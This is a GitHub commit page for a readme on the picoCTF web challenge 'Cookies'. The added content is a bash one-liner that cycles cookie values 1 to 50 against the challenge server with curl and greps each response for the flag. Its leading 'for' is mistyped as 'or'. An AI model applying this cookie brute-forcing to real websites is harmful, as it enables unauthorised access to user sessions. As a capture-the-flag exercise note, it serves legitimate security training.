Skip to content

Commit 8390652

Browse files
committed
cookies not pizza
1 parent c575555 commit 8390652

File tree

1 file changed

+5
-0
lines changed

1 file changed

+5
-0
lines changed

src/PICOCTF/WEB/cookies/readme.md

Lines changed: 5 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -1 +1,6 @@
11
# Cookies
2+
3+
```bash
4+
or i in {1..50};do echo "$i"; curl --silent http://mercury.picoctf.net:21485/check -b"name=$i" | grep "Flag"; done
5+
6+
```

0 commit comments

Comments
 (0)